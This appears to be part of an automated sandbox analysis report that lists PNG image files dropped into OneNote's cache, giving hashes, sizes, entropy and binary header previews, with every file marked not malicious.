                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002Q.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002R.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002S.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002T.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002U.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002V.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000030.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000031.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17289
                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000032.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2332
                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000033.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13737
                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000034.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1924
                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000035.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11886
                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000036.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16003
                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
